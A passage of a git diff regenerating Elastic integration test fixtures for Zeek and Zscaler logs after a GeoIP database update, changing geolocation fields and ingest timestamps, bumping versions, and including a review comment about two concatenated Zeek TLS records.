 "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
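Review bot: The `event.original` context line in this hunk holds two Zeek records run together, `...\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,...}`, so the second record's self-signed `validation_status`, `ja3`/`ja3s` and `resp_certificate_sha1` values are never parsed into ECS fields and never asserted by this fixture. This most likely comes from a missing newline between the two records in the matching `test-ssl.log` input rather than from this regeneration, but it leaves the ssl pipeline's self-signed-certificate and JA3 mappings without coverage, which is exactly the data a detection engineer would rely on. I would split the two records onto separate lines in the input and regenerate; the same concatenated value recurs in the `@@ -998` hunk of this file below.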
@@ -385,14 +385,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -447,7 +447,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148729700Z",
+ "ingested": "2021-12-14T14:59:24.817285055Z",
 "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -483,14 +483,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -528,7 +528,7 @@
 "resumed": false
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148735100Z",
+ "ingested": "2021-12-14T14:59:24.817285438Z",
 "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -564,14 +564,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -609,7 +609,7 @@
 "resumed": false
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148740400Z",
+ "ingested": "2021-12-14T14:59:24.817285822Z",
 "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -645,14 +645,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -690,7 +690,7 @@
 "resumed": false
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148744300Z",
+ "ingested": "2021-12-14T14:59:24.817286200Z",
 "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -711,14 +711,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -783,7 +783,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148748600Z",
+ "ingested": "2021-12-14T14:59:24.817286595Z",
 "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -819,14 +819,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -864,7 +864,7 @@
 "resumed": false
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148753700Z",
+ "ingested": "2021-12-14T14:59:24.817286971Z",
 "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -890,14 +890,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -998,7 +998,7 @@
 "version_protocol": "tls"
 },
 "event": {
- "ingested": "2021-12-09T13:51:13.148758300Z",
+ "ingested": "2021-12-14T14:59:24.817287346Z",
 "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json
index d5324a0a333..61d591e6228 100644
--- a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json
+++ b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json
@@ -54,7 +54,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:51:15.427176300Z",
+ "ingested": "2021-12-14T14:59:27.044634527Z",
 "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "metric"
@@ -125,7 +125,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:51:15.427184700Z",
+ "ingested": "2021-12-14T14:59:27.044637383Z",
 "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "metric"
diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json
index 0e2655f1e89..ff8c15b1393 100644
--- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json
+++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json
@@ -14,14 +14,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -39,7 +39,7 @@
 "ip": "192.168.1.1"
 },
 "event": {
- "ingested": "2021-12-09T13:51:15.714980100Z",
+ "ingested": "2021-12-14T14:59:27.298267374Z",
 "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}",
 "category": [
 "network"
@@ -66,14 +66,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -110,7 +110,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-12-09T13:51:15.714984Z",
+ "ingested": "2021-12-14T14:59:27.298270323Z",
 "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}",
 "category": [
 "network"
diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json
index 72d89700b42..bf37a3dfe84 100644
--- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json
+++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json
@@ -13,14 +13,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -42,14 +42,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -63,7 +63,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:51:16.028946100Z",
+ "ingested": "2021-12-14T14:59:27.604686278Z",
 "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -80,22 +80,34 @@
 ]
 },
 {
+ "@timestamp": "2018-12-10T01:34:26.743Z",
+ "ecs": {
+ "version": "1.12.0"
+ },
+ "related": {
+ "ip": [
+ "89.160.20.156"
+ ]
+ },
 "log": {
 "file": {
 "path": "/usr/local/var/log/zeek/tunnel.log"
 }
 },
+ "host": {
+ "name": "Lees-MBP.localdomain"
+ },
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -117,14 +129,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -137,23 +149,8 @@
 "port": 0,
 "ip": "89.160.20.156"
 },
- "tags": [
- "preserve_original_event"
- ],
- "@timestamp": "2018-12-10T01:34:26.743Z",
- "ecs": {
- "version": "1.12.0"
- },
- "related": {
- "ip": [
- "89.160.20.156"
- ]
- },
- "host": {
- "name": "Lees-MBP.localdomain"
- },
 "event": {
- "ingested": "2021-12-09T13:51:16.028954900Z",
+ "ingested": "2021-12-14T14:59:27.604689192Z",
 "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -164,7 +161,10 @@
 "type": [
 "connection"
 ]
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json
index 519d8c92459..13654e30aab 100644
--- a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json
+++ b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json
@@ -30,7 +30,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:51:16.462556600Z", + "ingested": "2021-12-14T14:59:28.025834867Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -59,7 +59,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:16.462595Z", + "ingested": "2021-12-14T14:59:28.025837639Z", "original": "{\"ts\":1580227259.342809,\"name\":\"non_ip_packet_in_ethernet\",\"notice\":false,\"peer\":\"ens3f1-4\"}", "category": [ "network" @@ -75,11 +75,24 @@ ] }, { + "@timestamp": "2018-12-03T22:59:59.993Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "192.168.1.2" + ] + }, "log": { "file": { "path": "/usr/local/var/log/zeek/weird.log" } }, + "host": { + "name": "Lees-MBP.localdomain" + }, "destination": { "port": 53, "address": "192.168.1.2", @@ -98,24 +111,8 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2018-12-03T22:59:59.993Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "192.168.1.2" - ] - }, - "host": { - "name": "Lees-MBP.localdomain" - }, "event": { - "ingested": "2021-12-09T13:51:16.462601800Z", + "ingested": "2021-12-14T14:59:28.025838095Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -126,7 +123,10 @@ "type": [ "info" ] - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file 
diff --git a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
index 1d15735c259..8a6a8b0cdb8 100644
--- a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
+++ b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json
@@ -210,7 +210,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-12-09T13:51:16.805683700Z", + "ingested": "2021-12-14T14:59:28.363491145Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\
",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ 
@@ -441,7 +441,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-12-09T13:51:16.805692200Z", + "ingested": "2021-12-14T14:59:28.363493315Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\
",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [
diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml
index 7b53a4ae2eb..a7b01be05b8 100644
--- a/packages/zeek/manifest.yml
+++ b/packages/zeek/manifest.yml
@@ -1,6 +1,6 @@
 name: zeek
 title: Zeek Logs
-version: 1.5.1
+version: 1.5.2
 release: ga
 description: Collect and parse logs from Zeek network security with Elastic Agent.
 type: integration
diff --git a/packages/zscaler/changelog.yml b/packages/zscaler/changelog.yml
index d6914e3b9a8..97c2b1e1176 100644
--- a/packages/zscaler/changelog.yml
+++ b/packages/zscaler/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.4.5"
+  changes:
+    - description: Regenerate test files using the new GeoIP database
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2339
 - version: "0.4.4"
   changes:
     - description: Uniform with guidelines
diff --git a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json
index 16cc51ef226..4845de1665e 100644
--- a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json
+++ b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json
